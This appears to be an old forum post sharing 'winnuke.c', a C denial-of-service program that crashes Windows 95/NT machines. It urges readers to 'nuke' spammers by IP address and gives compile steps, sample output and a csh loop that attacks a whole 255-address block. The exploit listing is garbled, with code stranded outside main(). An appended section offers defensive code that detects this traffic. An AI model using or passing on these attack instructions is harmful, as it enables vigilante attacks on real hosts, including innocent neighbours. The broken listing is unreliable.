Will pass on a particularly evil bit of code for those that despise
mass-marketing spammers....
This is not mine, I ran into it through the "reverse engineering" crowd.
Yes, it has been said that I have little patience. Find, Fix, Destroy.
------- Snip -------------
_How to Nuke spammers__
a nice fine c program (Winnuke) by _eci... listing at the end of this section
How to use WinNuke to get rid of spammers
winnuke.c is a program which will crash any Windows 95/NT machine. Since
this operating system is popular among spammers, winnuke makes it easy to
get rid of them.
First, take the program code from the bottom of this post (everything
after the ---Cut Here--- line) and save it to a text file called winnuke.c
on your shell account or Linux box.
Now compile it by typing:
gcc winnuke.c -o winnuke
If you have SunOS, you may need to use this command instead:
gcc winnuke.c -lsocket -lnsl -o winnuke
You should now have an executable program called winnuke in your directory.
Now find the spammer's IP number. This is the first IP number in the mail
headers which is not your mail server or mail relay. Once you have the
spammer's IP number (eg 192.168.12.109) type: ./winnuke 192.168.12.109
except use the spammer's real IP number that you found. You should see
something like the following:
% ./winnuke 192.168.12.109
Connected to [192.168.12.109:139].
Sending crash... Done!
%
Congratulations! You just nuked a spammer! Give yourself a pat on the
back. You can ping the IP address to verify that it is actually down.
If it doesn't work...
Unfortunately a few spammers don't have just one IP address but a whole
block (255 addresses). In this case you will need to nuke the entire block.
To do this, use this script:
#!/bin/csh
@ number = 255
loop:
@ number = $number - 1
./winnuke 205.199.212.$number &
#sleep 1
if ($number > 1) then
goto loop
endif
Except you should use the first three bytes of the spammer's IP number
instead of 205.199.212. If your net connection is too slow, uncomment the
sleep command (line 6) and that will slow it down so it can get all the
packets out. That's it...
---Cut Here---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define dport 139 /* Attack port: 139 is what we want */
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}
void main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(500000);
printf("Done!\n");
close(s);
}
jax(a)tvec.net
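
Added example, not part of the original post or of _eci's listing: send() with MSG_OOB makes the TCP stack set the URG flag, so the traffic winnuke.c produces shows up on the wire as an URG segment to port 139. The function below checks a raw IPv4 packet for exactly that; its name and the sample packet (documentation addresses 192.0.2.x, checksums zeroed and not verified) are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NETBIOS_SSN_PORT 139   /* same value as dport in the listing */
#define TCP_FLAG_URG     0x20  /* URG bit in the TCP flags byte */

/* Constructed sample: IPv4 + TCP, 192.0.2.10:1024 -> 192.0.2.20:139,
 * flags URG|PSH|ACK, urgent pointer 3, payload "Bye". */
static const uint8_t sample_oob[43] = {
    0x45,0x00,0x00,0x2b, 0x00,0x00,0x40,0x00, 0x40,0x06,0x00,0x00,
    192,0,2,10, 192,0,2,20,
    0x04,0x00,0x00,0x8b, 0,0,0,1, 0,0,0,1,
    0x50,0x38,0x20,0x00, 0x00,0x00,0x00,0x03,
    'B','y','e'
};

/* Returns 1 if pkt is a TCP segment to port 139 with URG set,
 * 0 if it is anything else, -1 if it is truncated or not IPv4. */
int is_oob_to_netbios(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;   /* IP header length */
    if (ihl < 20 || len < ihl)
        return -1;
    if (pkt[9] != 6)                            /* not TCP */
        return 0;
    if (((pkt[6] & 0x1f) << 8 | pkt[7]) != 0)   /* later fragment: no TCP header */
        return 0;
    if (len < ihl + 20)                         /* TCP header cut short */
        return -1;
    const uint8_t *tcp = pkt + ihl;
    uint16_t dst = (uint16_t)((tcp[2] << 8) | tcp[3]);
    return (dst == NETBIOS_SSN_PORT && (tcp[13] & TCP_FLAG_URG)) ? 1 : 0;
}

int main(void)
{
    uint8_t plain[sizeof sample_oob];
    memcpy(plain, sample_oob, sizeof plain);
    plain[33] = 0x18;                           /* same segment, PSH|ACK only */
    printf("URG segment:   %d\n", is_oob_to_netbios(sample_oob, sizeof sample_oob));
    printf("plain segment: %d\n", is_oob_to_netbios(plain, sizeof plain));
    return 0;
}
```

The same condition (TCP, destination port 139, URG set) is what a packet filter or IDS rule would match to drop or log this traffic at the network edge.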